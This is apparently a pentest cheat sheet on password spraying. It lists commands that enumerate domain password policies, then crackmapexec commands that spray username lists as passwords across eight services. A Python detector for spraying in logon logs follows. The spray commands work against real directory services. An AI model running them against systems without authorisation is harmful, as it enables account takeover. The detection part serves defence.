Once you have checked the target's password policy, it might be beneficial to run a password spray to get valid user/password combinations. This is especially useful in a CTF environment.
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linux -u 'username' -p 'password' -P <IP>
rpcclient -U "" -N 10.10.10.10; rpcclient $>querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
Execution
# Use My own script
# qspray nmap/all.nmap
# crackmapexec !
cme ftp $RHOST -u usernames.txt -p usernames.txt --continue-on-success
cme mssql $RHOST -u usernames.txt -p usernames.txt --continue-on-success
cme wmi $RHOST -u usernames.txt -p usernames.txt --continue-on-success
cme rdp $RHOST -u usernames.txt -p usernames.txt --continue-on-success
cme ldap $RHOST -u usernames.txt -p usernames.txt --continue-on-success
cme ssh $RHOST -u usernames.txt -p usernames.txt --continue-on-success
cme vnc $RHOST -u usernames.txt -p usernames.txt --continue-on-success
cme winrm $RHOST -u usernames.txt -p usernames.txt --continue-on-success
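On the defending side, runs like the ones above appear as a single source failing logons for many distinct accounts, often across several services, within a short window. The following is an added example, not part of the original notes: a Python detector over a constructed log format, where the format, the sample events and the names `parse` and `detect_spray` are all assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: time, source, account, service, outcome
SAMPLE_LOG = """\
2024-05-01T09:00:01 10.0.0.50 alice smb FAIL
2024-05-01T09:00:02 10.0.0.50 bob smb FAIL
2024-05-01T09:00:03 10.0.0.50 carol smb FAIL
2024-05-01T09:00:04 10.0.0.50 dave winrm FAIL
2024-05-01T09:00:05 10.0.0.50 erin winrm FAIL
2024-05-01T09:00:06 10.0.0.50 svc_backup winrm OK
2024-05-01T09:03:00 10.0.0.77 alice smb FAIL
2024-05-01T09:03:05 10.0.0.77 alice smb FAIL
2024-05-01T09:03:09 10.0.0.77 alice smb OK
"""

def parse(log):
    """Yield (time, source, account, service, ok) from the constructed format."""
    for line in log.splitlines():
        if line.strip():
            ts, src, user, svc, outcome = line.split()
            yield datetime.fromisoformat(ts), src, user, svc, outcome == "OK"

def detect_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Flag sources whose failed logons hit >= min_accounts distinct accounts
    inside one sliding window. A user mistyping a password fails repeatedly on
    ONE account; a spray fails once or twice on MANY, staying under lockout."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[1]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1                      # slide the window forward
            span = evs[start:end + 1]
            failed = {e[2] for e in span if not e[4]}
            if len(failed) >= min_accounts:     # keep the latest qualifying window
                findings[src] = {
                    "failed_accounts": sorted(failed),
                    "services": sorted({e[3] for e in span}),
                    # logons that succeeded mid-spray: reset these first
                    "succeeded": sorted({e[2] for e in span if e[4]}),
                }
    return findings

if __name__ == "__main__":
    print(detect_spray(parse(SAMPLE_LOG)))
```

Set `min_accounts` and `window` relative to the domain's lockout threshold and observation window, since a careful spray paces itself to stay just under both.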